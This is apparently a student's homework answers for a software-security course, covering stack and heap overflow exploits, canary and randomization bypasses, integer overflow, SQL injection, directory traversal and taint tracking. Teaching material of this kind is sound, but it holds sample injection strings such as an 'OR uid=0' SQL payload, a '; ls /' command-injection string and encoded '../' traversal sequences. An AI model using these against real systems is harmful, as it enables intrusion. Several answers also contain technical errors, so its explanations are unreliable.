nbuf, plen); .... } void g(const char *username, int ulen, const char *pass, int plen) { char *s1 = "/bin/bash"; char *s2 = "/bin/nologin"; if (auth(username, pass, plen)) execl(s1, s1, 0); // Execute login shell, or else execl(s2, s2, 0); // a program that prints an error and disconnects } Assume that - the parameters to g are read from an untrusted source (e.g., a network connection), - local variables are allocated in the order in which they are declared, i.e., nbuf will be closer to the return address than user. - all local variables are accessed using a BP register. On entry into any function, the first instruction pushes the current BP value on stack, and sets it to point to the value of SP. Thus, the variable nbuf will be accessed using the address [BP−0], while user will be accessed using [BP−2052]. ---------------------------------------------------------------------- ---------------------------------------------------------------------- (a) (OVERFLOWING RA, SBP, NBUF) Construct a simple stack−smashing attack on the function auth. Assume that the attacker knows the base of auth’s stack frame is in the range of 0xb11110 to 0xb11118. We consider the characters are allocated word (32 bit, 4 bytes). We also consider that our compiler access nbuf at [BP-4] as suggested in the exercise. The stack frame for auth function is: (top of memory, bottom and size of stack) (size of a word = 4 bytes = 32 bits) ----------------------- | argument plen | ----------------------- | argument pass | ----------------------- BP+44 (int) | argument ulen | ----------------------- BP+12 (char) | argument username | ----------------------- (beginning of arguments) BP+8 (~ 0xb11118 to 0xb11121) | return address | ----------------------- (return address) BP+4 (~ 0xb11114 to 0xb1111c) | saved BP | ----------------------- (base of AR) BP-0 (somewhere among 0xb11110 to 0xb11118) | *nbuf(local var) | ----------------------- (accessing nbuf) BP-4 (~ 0xb11106 to 0xb11114) | user[511]-user[508] | | user[507]-user[503] | | ... | ----------------------- (accessing user) BP-(4*512+4=2052) (~ 0xb11090c to 0xb110915) (bottom of memory, stack growing direction, top of stack) In a very simple attack we overflow user[512] in the first bcopy call, overwriting nbuf, saved BP, return address and even the arguments (making use of the advantage that nbuf is a pointer). The attack code has the following properties: 1) To overcome the problem of finding where the return address is located, we spam the new address in at least 8 positions. Since we have an uncertainty of 8 bytes and since nbuf, saved BP and return address have all 1 word size, we overflow our user with at least 12 (512+12) more bytes plus our estimate range of 8 bytes (however more is better and as cited on [1], in reality the buffer overflow should be about 100 more bytes than its regular size). Then we overwrite a total of 20 bytes to be sure. The buffer should then have a size 512+12+8=532, and ends in the position where the argument ulen is. 2) To overcome the problem of where the attack code start, we need to add many NOP (1 byte each, but for our case, 1 word each), which will advance instruction pointer by one. We create a lot of them targeting a region that we know is before the attack code. So they can copy the first in the beginning of our string user, which had the range of 8 bytes. We take the first possible address to play safe: 0xb11090c, and add at least another 8 more NOP, until, let's say, 0xb110915. Therefore, the value of the jump address will be from the region were we set the many new return address until some point where we have a NOP. For an illustration, we say that we've set the new address to go to 0xb110914: (AT = attack code) [0xb110914] | ........ | ------------------------- [0xb110914] | AT: NEW RET (old RA) | -------------------------- [0xb110914] | AT: NEW RET (sPr) |------ ------------------------- | [0xb110914] | AT: NEW RET (sbuf) | | ------------------------- | | AT:COMMANDS | | | | | | | | -- ---------------------- | | AT:NOPS[0xb110915] | | ------------------------- | | AT:NOPS[0xb110914] | <---- -- ---------------------- | AT:NOPS[0xb110913] | -- ---------------------- | AT:NOPS[0xb110912] | ------------------------- ------------------------------------------------------------------------ ------------------------------------------------------------------------ (b) (OVERFLOWING SBP) Consider a variation of the above attack that targets the saved BP without corrupting the return address. The goal of this attack is to modify the saved BP so that when control returns from auth to g, the local variables s1 and s2 point to attacker−controlled values. Construct this attack so that the attacker can execute "/bin/sh" even if auth returns 0. Again, show all the relevant details. Assume for this problem that the attacker knows the exact base address of auth’s stack frame to be 0xb11110. Now we just need to overwrite the saved return address after the second bcopy, so the next time a function access stack (assuming it's execl), the saved address points to our address. We can overflow nbuff with 4 more bytes overwriting the saved BP to point to "/bin/sh". | ........ | ------------------ | RETURN ADDRESS | ------------------ [/bin/sh ] | AT: saved RA | ------------------ (base of AR) BP-0 (0xb11110) | nbuf | ------------------ BP-4 (0xb11106) | user[512] | | | ------------------ BP=2052 (0xb11090) --------------------------------I---------------------------------------- ------------------------------------------------------------------------ (c) (OVERWRITE RA) Construct a return−to−libc attack that exploits the vulnerability in auth. Your attack should return to the beginning of the library function execl located at address 0x800000 with the first parameter "/bin/sh". Show all of the relevant details of the attack string that achieves this objective. A return-to-libc attack starts with a buffer overflow in which the return address stack is replaced by the address of another instruction and an additional portion of the stack is overwritten to provide arguments to this function. This allows attackers to call preexisting functions without the need to inject malicious code into a program. In our overflow, we can corrupt the return address to 0x800000, as well as the command (parameters) "/bin/sh" we want system to execute. This technique makes is based on a non-executable stack. | AT: "/bin/sh" | ------------------ [0x800000] | AT: Return Add | ------------------ | AT: saved RA | ------------------ | AT: nbuf | ------------------ | AT: user[512] | ------------------ ------------------------------------------------------------------------ ------------------------------------------------------------------------ (d) (ATTACKING WITH CANARY: DOUBLE POINTER ATTACK) (Now assume that Stackguard is used to protect against the vulnerability in auth. (Recall that Stackguard writes a random−valued canary at the beginning of the function on the stack −− assume that this write takes place at the location next to the saved BP, so that both BP and RA are protected by the canary. Before return, this value is checked, and if the value is different from the one that was written at the beginning of the function, an attack is flagged.) Show that it is still possible to corrupt the return address by first corrupting nbuf to point to the RA, and then using the second bcopy to corrupt it. Provide the relevant details of the username and pass buffers to achieve an injected code attack. ---------------- | Return Add | ---------------- -> 0xb11114 (BP+4) | Saved BP | ---------------- -> 0xb11110 (BP) | Canary | | | ---------------- -> BP-8 | nbuf | ---------------- -> BP-12 | user[512] | | | | ... | ---------------- StackGuard protects stack by inserting a canary between control data and buffer. However we can still craft the following attack: 1) In the first bcopy, we overflow user[512] with a username that overwrites the pointer nbuf to point to the return address. The username would have 512 + 4 bytes, where these last bytes contain the address 0xb11114 (if we are still considering the base 0xb11110). 2) The second bcopy gives nbuf as a parameter, the register goes directly to where it points: to the return address. Therefore the password given will be directed added to RA without corrupting the canary. This password contains the address we want, it can either point to some address such as in item b, or back to some point on user, if we had our attack code injected into it on the first bcopy. 3) Other possible attacks: attacks using format string, bad generation of canary, heap overflow cannot be defended, function pointers stored in virtual tables can be exploited. ------------------------------------------------------------------------- ------------------------------------------------------------------------- (e) (ATTACKING WITH CANARY) Show how to modify the attack of (d) to work with ProPolice; or argue that it is not possible. Propolice protects not only the Return Address, but all of the registers by the following improvements: (1) reordering local variables to place buffers after pointers, avoiding corruption of pointers to other memory locations, (2) copying pointers in arguments to an area before local variable buffers, preventing corruption of pointers that could be used to other memory locations. Propolice would put the buffer user[512] after the pointer nbuf: ---------------- | Return Add | ---------------- | Saved BP | ---------------- -> 0xb11110 (BP) | Canary | | | ---------------- | user[512] | | | | ... | ---------------- | nbuf | ---------------- The first bcopy could not overflow anything without bypass the Canary we could have an attack code on the 512 bytes and access this with the second bcopy (by pointing to the attack code on user) but this would not be by stack overflow, i.e., this configuration protected against overflow. ------------------------------------------------------------------------- ------------------------------------------------------------------------- (f) (SECOND COPY RA, OVERWRITING SBP) Modify the attack in (d) so that it works against a stack−smashing defense that does not use canaries, but relies on a second copy that is saved elsewhere in memory. If there are additional assumptions that need to be made in order to craft a successful attack, identify them. ---------------- | Return Add | ---------------- -> 0xb11114 | Saved BP | ---------------- -> 0xb11110 (BP) | nbuf | ---------------- -> 0xb11106 | user[512] | | | | ... | ---------------- --------------- | RA copy | --------------- -> SecCoAdd somewhere If there is an overflow on the buffer that overwrites the RA, it will not check with the second copy elsewhere. However, in our case we still can have an attack that does not require to change the return address, such in (b), modifying the saved BP to point to wherever we want. In cases of non-executable stack, we could exploit a more sophisticated attack: injecting code into heap and then make the program jump to that location by manipulating function pointers. *********************************************************************** *********************************************************************** *********************************************************************** 35) HEAP OVERFLOW Here is a possible implementation of heap management routines. Assume that heap blocks are declared as C−style structures. Assume that block sizes are a power of two. Blocks of same size are linked together using prev and next fields: -------------------------------------------------------------------------- struct heap_block { bool in_use; // false when a block is in some free list; true otherwise --> (1 bit, least significant bytes of size) unsigned size; // size of this block; -> (4 bytes) unsigned prev_size; // size of previous block -> (4 bytes) heap_block *prev; // -> (2 bytes) heap_block *next; // -> (2 bytes) }; ------------------------------------------------------------------------- Depending on the size of the block, there will be 0 or more bytes of data in a heap block that follows the above bytes, but the structure declaration above does not need to include them since they are never accessed by the heap management routines. When malloc is called, assume that the memory manager simply goes to the free list corresponding to the block size requested, and returns the first element as follows: -------------------------------------------------------------- (MALLOC: SEARCH FREE LIST FOR USABLE MEMORY BLOCK) heap_block *current = head; head = head−>next; // remove first element from this free list return (char *)(¤t−>prev); --------------------------------------------------------------- Note that the block returns a pointer corresponding to the "prev" field −− this because the block is no longer on any free list, so these fields can now be used to store user data. However, the in_use, size and prev_size fields are still used to support "coalescing" of adjacent free blocks. When a block is freed using free(b), its adjacent block’s status is checked as follows: --------------------------------------------------------------------- (FREE: PUT BLOCK ONTO THE HEAD OF THE FREE LIST) heap_block *h = (heap_block*)(b−12); // hack to compute base of header heap_block *n = (heap_block*)(b−12+h−>size); heap_block *p = (heap_block*)(b−12−h−>prev_size); if (!n−>in_use) { n−>prev−>next = n−>next; n−>next−>prev = n−>prev; .... combine h & n into one block, insert into the right free list... if (!p−>in_use) /* similar code for merging h and p */ } ----------------------------------------------------------------------- Now, consider a heap overflow vulnerability in the code shown below: ---------------------------------------------------------------------- (HEAP OVERFLOW) char *b = malloc(32); read(fd, buf, 256); strcpy(b, buf); ... free(b); ------------------------------------------------------------------------- (a) Suppose that an attacker wishes to exploit the above program using a heap overflow attack. What should the attack message being read at the second of the 4 lines of vulnerable code above? Identify any assumptions that you need to make regarding the locations of objects in memory. When is your exploit triggered? Memory in heaps is allocated by "allocation units" which is the granularity of the blocks. To manage memory for every block, the header is created, which same granularity. The function malloc() allocates a block of 32 bytes for b. The function read() reads 256 bytes from the file associated to fd. The function strcpy() copies the (possible) 256 characters of buf to the allocated memory block b, of 32 bytes size. In the normal execution, free heap blocks are double linked: | ----------header-------- | | | in_use | | | | previous_size | | | | size | | ------ | * prev |<---- -----> | * next |----- | ------------------------ | | | Free space | | | ------------------------ | | ----------header-------- | | | in_use | | | | previous_size | | | | size | | ------ | * prev |<---- -----> | * next |----- | ------------------------ | | | Free space | | | ------------------------ | When the blocks are allocated, they use the links for user data: ----------header-------- | in_use | | previous_size | | size | ------------------------ | user data | ------------------------ The main idea of heap overflow is to overwrite an important variable stored after an overflowable buffer and exploit the header, since the allocation depends on the the system memory allocator implementation. We can proceed with an attack that is triggered when the blocks are merged (have the unlinking process in free() pointing to our address with attack code): 1) Controlling the contend of buf (with read() from fd) allow us to overflow b's control information data. Modifying next/prev in free() allow us to overwrite the functions points for functions we want. We need to corrupt the 4 bytes of next/prev and set in_use=0 (to set next block as free). This creates a next block, where we insert the ATTACK_CODE (for example, shell code). We also change SIZE, because consolidation of jumps to the next free block is based on the current block's size. We suppose buf was allocated by malloc(256), this creates a block of 4+256+4 bytes of boundary data. The size of data that can be held is 256+4=260 (prev_size of next block, which is b). We can store our shell code in these 256 bytes. 2) We set the size of b=16 by the overwrite and set in_use=0 and create a "next" block after it. 3) We then need to modify b's next and prev the way we want. For this, we need to find where is our function pointer, from the function free(), wee see that the offset is 12. The part of the heap management that adds/removes free blocks trust on the values on next/previous. An attack can overwrite control data in a block in the freelist that is then allocated. We want to overwrite the next block as a free block with our data and for this the heap management need to set the header correctly, e.g. b->next->in_use has to have the value 0 so that "free" blocks will be merged the time that free(b) is called. 4) The address of our shellcode can be written as b->next=, but this has to be placed 8 bytes after the user data. Also, the shell code should contain the first 8 bytes of NOP (jump instructions) to the 12th byte, where is the shellcode. 5) Calls in programs take place through indirect addressing to allow relocation in the system. Therefore, when a function such as read() is called, the address from the GOT is referenced and this address contains the real address of the function where the code jumps. A possible ASCII for the attack can be: <32 bytes of anything><4 bytes of previous_size=-16><4 bytes of size of this block=0, in_use=0> <8 bytes of anything><8 bytes of NOP, pointing to the overwritten location-12(GOT)><12 bytes of anything> 6) For "anything" we should only avoid bytes that break the string such as null, newline and carriage return. The fake heap block headers will be unlinked and the localization of shellcode will be copied to the localization of the return pointer. 7) The way we encode that ASCII to message would be like this "head->next=attack_next; head->prev=attack_previous; head->in_use=0; ..., etc". ------------------------------------------------------------------------- ------------------------------------------------------------------------- (b) Suppose a defense against heap overflow exploits is designed that is based on putting a canary before, after, or in the middle of the header structure. Where should it be located? Why? Describe your canary−based defense in detail. Specifically, modify the definition of heap_header structure and all the heap manipulation code given above to incorporate the canary and all the relevant checks on it. Looking to the head assignments when we call malloc(); the line "head = head ->next" is what we will corrupt later when when call free(). The canary should be located on the end of the header, so it would not allow the junction of a fake header to an arbitrary block. The canary could be something like this before the return: if (canary==global_random) return; else abort(); *********************************************************************** *********************************************************************** *********************************************************************** 36) INTEGER OVERFLOW Consider a (binary) data file whose structure is as follows: ---------------------------------------------- short totalLen; // assume 16−bits, signed short nparts; // assume 16−bits, signed // Part 1 begins here unsigned char len1; // 8−bits ... len1 data bytes ... // Part 2 begins here unsigned char len1; // 8−bits ... len1 data bytes ... ... ------------------------------------------- Write a plausible code snippet for reading such a file that contains an integer overflow vulnerability. For full credit, (a) make your code snippet as realistic as possible (b) if there are multiple plausible integer overflow vulnerabilities, identify them with multiple vulnerable code snippets. Let us test this data on many integer overflows forms: We want to check whether the total length of the file is correct (to see whether the file is corrupted, etc). 1) In our first attempt, we make an Assignment between variables of different signs: 1 short int buf_totalLen; // 2 bytes sig: -32,768 -> +32,767 short int buf_nparts; // 2 bytes sig: -32,768 -> +32,767 char buf_len1; // 1 byte for an previous unsigned (0 -> +255) to a signed (-128->127) // If len1 was bigger than 127, it will be attributed as negative here short int calc_totalLen; //2 bytes sig: -32,768 -> +32,767 short int read_bytes; // 2 bytes sig: -32,768 -> +32,767 7 //read totalLen fseek(file, 0, SEEK_SET); read_bytes = read(file, sizeof(buf_totalLen), buf_totalLen); 10 //read nparts: fseek(file, read_bytes, SEEK_CUR); read_bytes = read(file,sizeof(buf_nparts), buf_nparts); 13 //read first lent1 fseek(file, read_bytes, SEEK_CUR); read_bytes = read(file,sizeof(buf_len1), bug_len1); //pointer now is where the first part starts 16 //it was suggested that all len1 are the same calc_totalLen = buf_nparts* buf_len1; // if buf_len was negative, the calc_totalLen is now negative! 21 if(calc_totalLen != buf_totalLen){ cout >> "File corrupted" >> endl; return -1;} The message "File corrupted" is going to happen every time len1 was bigger than 127, not only when the file is corrupted. When assigning an unsigned integer to a signed integer variable, if the unsigned value has 1 on the highest bit, after the assignment, the signed variable will be a negative integer. 2) In our second attempt, we decide to make everything unsigned. Since totalLen was a short int, we decide to attributive an unsigned short int for our calculated variables. Now, we will explicitly see the mess with the size of the variables, which will cause an Arithmetic overflow: 1 short int buf_totalLen; // 2 bytes sig: -32,768 -> +32,767 short int buf_nparts; // 2 bytes sig: -32,768 -> +32,767 unsigned char buf_len1; // 1 byte unsig, 0 -> +255 unsigned short int calc_totalLen; // 2 bytes unsig unsigned short int read_bytes; // 2 bytes unsig 7 //read totalLen fseek(file, 0, SEEK_SET); read_bytes = read(file, sizeof(buf_totalLen), buf_totalLen); 10 //read nparts: fseek(file, read_bytes, SEEK_CUR); read_bytes = read(file,sizeof(buf_nparts), buf_nparts); 13 //read first lent1 fseek(file, read_bytes, SEEK_CUR); read_bytes = read(file,sizeof(buf_len1), bug_len1); 16 //it was suggested that all len1 are the same calc_totalLen = buf_nparts* buf_len1; // now if buf_nparts and buf_len1 are sufficiently big, their multiplication can result in more than 2 bytes, and cal_totalLen will have the overflow as its value. 21 if (calc_totalLen != buf_totalLen){ cout >> "File corrupted" >> endl; return -1;} The "file corrupted" message also will happen when there is an arithmetic overflow on calc_totalLen. 3) In our third attempt, to correct the previous problem, we decide to assign long to calc_totalLen. We also want to improve our code to find which of the three sides is wrong if we see the "File corrupted" warning, and then keep the execution of the program with the real_fileLen, which is what we care. We will then have Assignment between variables of different width: 1 short int buf_totalLen; // 2 bytes sig: -32,768 -> +32,767 short int buf_nparts; // 2 bytes sig: -32,768 -> +32,767 unsigned char buf_len1; // 1 byte unsigned 0 -> +255 long int calc_totalLen; //4 bytes sig: -2,147,483,648 -> 2,147,483,64 short int real_fileLen; // 2 bytes sig: -32,768 -> +32,767 short int read_bytes; // 2 bytes sig: -32,768 -> +32,767 7 //read totalLen fseek(file, 0, SEEK_SET); read_bytes = read(file, sizeof(buf_totalLen), buf_totalLen); 10 //read nparts: fseek(file, read_bytes, SEEK_CUR); read_bytes = read(file,sizeof(buf_nparts), buf_nparts); 13 //read first lent1 fseek(file, read_bytes, SEEK_CUR); read_bytes = read(file,sizeof(buf_len1), bug_len1); 16 //it was suggested that all len1 are the same calc_totalLen = buf_nparts* buf_len1; 18 // to see the real size fseek(file, read_bytes, SEEKEND); real_fileLen = ftell(file); // let us check the three sizes 25 if(real_fileLen != calc_totalLen){ cout >> "Real size of the size is different than the calculated file size." >> endl; 27 real_fileLen = calc_totalLen; // here we are attributing a large variable to a smaller!!!! } 29 if(real_fileLen != buf_totalLen){ cout >> "Real size of file is different than the header value." >> endl; real_fileLen = buf_totalLen; } If calc_totalLen is big enough, everything after line 27 is not going to work correctly because of the integer overflow (real_fileLen will end up always getting the value of buf_totalLen). *********************************************************************** *********************************************************************** *********************************************************************** 37) ADDRESS RANDOMIZATION: Suppose that address randomization is used. Explain in detail how will it will (or won’t) break the exploits you developed previous problems? (a) Which steps in each of your exploit will be broken by a very basic absolute address randomization which simply adds a single fixed random−valued offset to every base address of every memory region. Which steps of your exploit will be broken by this technique? If there are multiple steps in the exploit (e.g., a heap overflow involves 2 pointers to be corrupted), indicate if the attacker has to have additional knowledge to defeat ASR in the subsequent steps as compared to the initial step. ASR works for attacks that are based on pointer corruption: 1) Stack overflow: in principle, the attacker would not be able to estimate the base pointer and the localization of the other pointers on the stack, to craft the attacks of question 1. However if she knows where is the address, the attacks would be exactly the same + the offset given by ASR. The exception is for the return-to-libc attack: it's not possible to achieve complete randomness in ASR and some memory regions (libraries) can be required to be aligned on page boundaries, making their bits predictable. 2) Heap Overflow: involves 2 pointers to be corrupted, the first is the location of a function pointer that we want to change and the second the jump to the code. In ASR, if the first pointer is guessed, the second is predicted since it only one random value (this attack already has a relative address definition). 3) Integer Overflow: there are buffer overflows that are undetected because of integer overflows. However many integer overflow vulnerabilities result in an out-of-bounds access, involving a base address and an offset. This is a relative address attack, not protected by ASR. In conclusion, the limitations of ASR are: Brute force attacks, relative address attacks and information leakage attacks. ------------------------------------------------------------------------- ------------------------------------------------------------------------- (c) How will your answer to part (a) change if relative address randomization was used? In RAR, the relative address of individual code, data objects ans distance between functions are randomized. 1) Stack overflow: Changing relative address of existing functions helps to return-to-libc attacks. In the last item of question 1, we see that Propolice changes the relative order of local variables. However this is done in a very predictable way. 2) Heap Overflow: The relative distance between functions is randomized, so guessing the first pointer does not give the localization of the second, as before. *********************************************************************** *********************************************************************** *********************************************************************** 38) ADDRESS RANDOMIZATION Suppose that there is a vulnerability in a randomization−based defense that permits you to execute injected code. However, the system deploys a checker in the kernel that identifies the origin of system calls. If it is any location other than sites within standard libraries that are known to make system calls, then this checker terminates the caller. (a) How will you work around this checker so that your code can make system calls in the presence of absolute address randomization as described in part (a) of the previous problem. Note that due to the use of ASR, your code does not know the memory locations of any data or code objects in memory, but it can access the values in the CPU registers at the point when the injected code execution begins. Hint: Starting from register values, is there a way you can examine program memory to identify the locations of one or more objects in memory? Since all address are absolute, if you know the offset, finding the address of one object gives the address of the following objects. When we debug our code, we can use the "examine" command (x in gdb) to examine memory independent of the program's data type. We can specify the address, and do many operations such as count the number of integers from this address, or print some words of memory above a stack base point, etc, and use this information to access the values of the register where we injected our code. In other words, once we find the start address, we can find the system call by the offset and then use for a return-to-libc attack call, for example. ------------------------------------------------------------------------- ------------------------------------------------------------------------- (c) Suppose that both relative address ASR and DSR are used. Can you modify your injected code so that it can successfully execute arbitrary system calls? How? Yes, we can use the relative address of target to corrupt a pointer (for example, by wrong attribution of different size variables) and then wait until the moment the program has to use the contend of this pointer. This can be used in both stack and heap overflows. *********************************************************************** *********************************************************************** *********************************************************************** 39) MEMORY ERRORS (a) Identify all possible memory errors in the program above. Your answer should take the form of annotations to the above program so that the place where the error occurs is identified, as well as its nature (spatial or temporal), together with any justification that may be necessary. Recall that in the C−language, overflows from one field within a struct into the next field are permitted. You can also assume that variables are allocated in the order they are declared. For instance, r[42] will access q. To check for memory errors in codes, we look for: - Overflow of variables that are not bound checked. - Spatial errors, that have out of bound access or corrupted pointers or null pointer dereference, - Temporal errors, that are dangling pointers. - Memory leaks. All the errors are spatial if not otherwise specified, dereferences of uninitialized or null pointers can be either temporal or spatial. (NO BOUND CHECKING METHODS) ----------------------------------------------------------------- union A { - char* a; int b; } aa, ab; struct B { char *c; --> Note: sizeof(c) = 1 byte char *c1; char d[30]; int e[18]; } ba, *bb; struct C { int f; --> Note: sizeof(f) = 4 bytes char *f1; char g[30]; int h[18]; } ca; void freeB(struct B* p) { if (p−>c != NULL) free(p−>c); free(p); } char *ff(char *s) { char t[32]; char *p; int i; for (i=0, p=t; (p < &t[32]) && (s[i] != ’\0’); i++, p++) { ----> p=t should be p=&t[0] or *p=t[0] (if we change the next declaration), t was not initialized. In the DSR transformation approach it would not be necessary to assign same mask to this kind of declaration (p=t). *p = s[i]; } /* Point (1) */ if (p >= &t[32]) p−−; *p = ’\0’; return t; --> it returns the address (temporal error) } int main() { char *r = "0123456789012345678901234567890123456789"; char *q; char *u; int *v; int i, j; bb = (struct B*)&ca; -----> struct B can be bigger than struct C (*char vs int) so bb might overflow printf(bb−>c); ---> since it was not initialized, prints address printf(bb−>c1); bb = (struct B*)malloc(sizeof(struct B)); -----> it had the address of struct C but allocates size of struct B for (i=0; 1; i += 6) { bb−>d[i] = ’\0’; if (i > 30) break; ------> breaks with i==36, bb->d[36] with the las \0 at bb->d[30]: overflow } for (v=&bb−>e[0]; v < &bb−>e[17]; v += 4) ---> gets the address of e[0], but e was overflowed by the last loop, *v = 0; ---> v==0, 4,8,12,16,18 so overflows at v=&bb->e[18] j = (int)v; j −= 20; ----> first, j is not a pointer (int to pointer, value is an address) and its values goes beyond bounds: buffer underflow!!!! v −= 2; --> v ==-2!!!,2,6,8,12,16 *v = 0; --> buffer underflow bb−>c = malloc(32); bcopy(bb, &ba, sizeof(struct B)); ---> the string c had 32 bytes allocated, and goes to address of a int f which is not a pointer), bb is already overflowed, so this overflows into the address of &ba (32+18+30+.. >=100...) aa.a = r; ---> the previous overflow can affect the contend of *r aa.b += 42; ---> b was not initialized and it has the values of the overflow offset by 42 if (*aa.a == ’\0’) ---> gets the value of the address!!! printf("ZERO!"); q = ff(r); -----> should be *q=ff(r) since it returns a value (t), it's ok only if we wanted t address, also, r here is modified because of the overflow, temporal error u = ff(q); } v−−; ---> v ended on v==16, so goes to v==14 ---> dangling pointer (temporal) *v = 0; v = (int *)j; ---> j went very far beyond bounds and v now is there *v = 0; ---> buffer underflow freeB(bb); ---> it's not going to free c since it got null values because of the overflows, but it does free the struct!!!! printf(ba.c); ---> print the wrong c (not ba's!!!!), a temporal error return 0; } ------------------------------------------------------------------------- ------------------------------------------------------------------------- (b) Assuming the use of Kelly and Jones bounds−checking method, show the contents of the splay tree at "Point (1)" in the second invocation of ff() in the above program. In the Jones and Kelly bounds-checking, every time memory is allocated, the beginning and end of the variable are stored in a data structure such as a Splay Tree (for instance: static variables at the beginning of the program; local variables at the entry of each function/deleted on the end; malloc operations followed by free). Therefore, all pointers must be derived from existing pointers to valid objects. (also Jones and Kelly pad 1 extra byte to account 1 past the bound of the array.) Without taking into the account all of the errors before in the code, the splay tree of the ff() shows the offsets that each variable should have (where p=t means that we do not need to mask *p=&t[0]) First call: object start end pointer (*s==*r) x 42 buf (t) x 32 pointer (*p) x 31 Second call: object start end pointer (*s==*q) x 31 buf (t) x 32 pointer (*p) x 30 But we know that we had an overflow and we have an address return by the first ff() and inserted in the second ff(). For the first problem, it would result into offset in the addresses of the local variable of ff(). This calculate things waaaay out-of-bound!!!! In the second problem we would have *p never being >&t[32] with no \0 so it could assume all the value of *r. This result in the second call being overflowed, giving an address to *p away from &t. Another point is that one of the problems described in a) is in the malloc call, that comes right before the pointer to r. If we wrapped the malloc by bounds-checking approaches, the information of the objects could still be on the splay tree! So we need to check the pointers arithmetic, not their dereferences! ------------------------------------------------------------------------- ------------------------------------------------------------------------- (c) Which pointers have the value of an out−of−bounds object at "Point (1)" in the second invocation of ff()? For each of them, identify the associated metadata. We associate a pointer_info with metadata for each pointer (and we can do the same for struct, associating a struct_info with metadata for each struct, which would help a lot in this code). The metadata contains the base address and the allocated size of each memory block. A unique capability can be associated to each block to avoid temporal errors, and in our case helping with the dangling pointer of ff(). *s has OOB of *r --> r_info_metadata: size=42, (relative) address y0 (global variables) *p has OOB of &t[32]---> t_info_metadata: size=32+1, (relative) address z0 (local variables) , cap-to the block (for temporal errors) So OOB object is used to stores the original base address of the pointers and after the pointer arithmetic, we maintain additional metadata to compute the location of where the new metadata was obtained. *********************************************************************** *********************************************************************** *********************************************************************** 40) SQL INJECTIONS Consider the following code snippet. Does it have one or more SQL injection vulnerabilities? If not, justify. Otherwise, identify each vulnerability and develop a corresponding exploit. (UID: REMOVE ' AND " FROM A STRING AND THEN EXECUTE A COMMAND) ------------------------------------------------------------------------------------- 01 char *f1 = get_form_field("f1"); char *f2 = get_form_field("f2"); char *f3, *f4, *f5, *uid, *p, *q; 04 for (char *p=f1; (*p != ’\0’); p++) { if ((*p == ’\’’)||(*p == ’"’)) /* Replace unescaped quotes with ’_’ */ 06 if (p > f1) if (*(p−1) != ’\\’) /* escape character */ { *p = ’_’; } f3 = malloc(strlen(f1)+100); 13 sprintf(f3, "SELECT uid FROM users WHERE username = ’%s’", f1); 14 .... /* Send the query f3 to database and store the result into uid */ (EMAIL: REMOVE -- FROM A STRING AND IF ITS NOT alphanumeric, -, _, @, ., ADVANCE POINTER, THEM ADVANCE AGAIN) -------------------------------------------------------------------------------- 15 f4 = malloc(strlen(f2)+1); 16 for (q=f2, p=f4; (*q != ’\0’);) { if (*q == ’−’) { if (*(q+1) == ’−’) { /* "−−" signifies a comment in SQL: we dont want to permit them */ q += 2; continue; } } 21 else if (!isalnum(*q)&&(*q!=’−’)&&(*q!=’_’)&&(*q!=’@’)&&(*q!=’.’)) { q++; continue; } *p++ = *q++; } 27 *p = ’\0’; 28 f5 = malloc(strlen(f4)+strlen(uid)+100); 29 sprintf(f5, "UPDATE users SET email = %s WHERE uid = %s", f4, uid); 30 .... /* Send f5 to the database */ ------------------------------------------------------------------------------------- The exploit of these codes are when the function sprintf executes the commands. The injection occurs when the user input is not correctly filtered for escape characters. Some of the exploits are: 1) In the line 06, the quotes on the FIRST char of the string are not replaced for f1=""ATTACKCOMMAND;'. An example could be "" OR uid =0;' (so the attacker can change the email of any user). 2) Another that can happen is the incorrect type handling, since the code does not check whether f1 gives a numeric field for uid, for example using 1;ATTACKCOMAND (such as DROP, DELETE, etc). 3) Preparing for the second part, we can have our uid written with the comments in SQL, since they are not filtered: --, ({, /* 4) In the second part, if uid was not a number but was modified as above, we have our ATTACKCOMMAND crafted. *********************************************************************** *********************************************************************** *********************************************************************** 41) DIRECTORY TRAVERSAL ATTACK Is the following code vulnerable to a directory traversal attack? The goal of such an attack would be to list a directory that is outside of the document root /var/www/html chosen by the server code below. If the code is vulnerable, develop an attack on the server. Note that popen is a standard C library function used to execute a shell command. If the second argument is the string "r" then the output of the command can be read from the stream returned by popen. -------------------------------------------------------------- 1 char *s = get_form_field("path"); 2 char *p; 3 int depth = 0; 4 if ((strstr(s, "/./") != NULL) || (strstr(s, "//") != NULL)) { /* return error message */ } 6 for (depth=0, p=s; (*p != ’\0’);) { 7 if ((*p == ’.’) && (*(p+1) == ’.’) && (*(p+2) == ’/’)) { depth−−; p+= 3; } 10 else { while ((*p != ’/’) && (*p != ’\0’)) p++; if (*p == ’/’) { depth++; p++; } } } 18 if (depth >= 0) { char *cmd = malloc(strlen(s)+100); char *c1 = "ls /var/www/html"; char *p, *q; FILE *fp; for (p = cmd, q = c1; (*q != ’\0’); p++, q++) *p = *q; *p++ = ’/’; for (q = s; (*q != ’\0’); p++, q++) *p = *q; fp = popen(cmd, "r"); /* read the data from fp and return it to the client */ 30 } else { /* return error message */ } ------------------------------------------------------------- 1) This code has protection for attacks of the type "/../../../../atackfile" but not for other possibilities of traversal attack such as strings with attack path that are percent encoded (URL enconding) or even multiple percent encoding: ../ is %2e%2e%2f or %2e%2e/or ..%2f / is %c1%1c 2) In the line 7, the if only excludes "../" but not "..", which list /var/www/ and could be used for a iteration. 3) The code also have weakness such as the possibility of a string "; ls /". *********************************************************************** *********************************************************************** *********************************************************************** 42) TAINT-TRACKING (a) If only data dependencies are tracked, identify the variables that would be tainted at the end of the code snippet. For each such variable, identify the bytes that are tainted. A one-bit taint-tag can be used for each byte of memory, with 0 representing the absence of taint. Therefore, the taint bit associated with a byte at address a is a tagmap[a]. If only data is tracked: Variable Tainted(E) s tag(s, sizeof(*s)) c1 0 (constant is not tainted) (also some of these variables are tainted by explicit flow: i) the result of arithmetic expression is tainted if any of variable is tainted. ii) a variable is tainted by assignment of a tainted variable.) ------------------------------------------------------------------------- ------------------------------------------------------------------------- (b) Describe precisely a policy that can detect command injection attacks using taint information. In this kind of attack, if the path contains the attack strings (../, %2e%2e%2f, etc). then the real path should not go beyond the top level that are allowed by the server. First, we define the taint-annotated regular expression (TARE) by ^t, ^T or ^u: a string s will match a TARE r^t if s matches r and at least one c of s is tainted a string s will match a TARE r^T if s matches r and all c of s is tainted a string s will match a TARE r^u if s matches r and no c of s is tainted Then, the policies could be as in [2]: DirTranversalModifier = '..'|| '%2e%2e%2f'... file_function(path) = p[en(path)||unlink(path)... file_function(path) | path matches any * (DirTransversalModifier)^T any * && escapeRootDir(path) -> reject() Also, a taint-enhanced policy can be used enforce a restrictive policy on file access when the file is tainted, not allowing 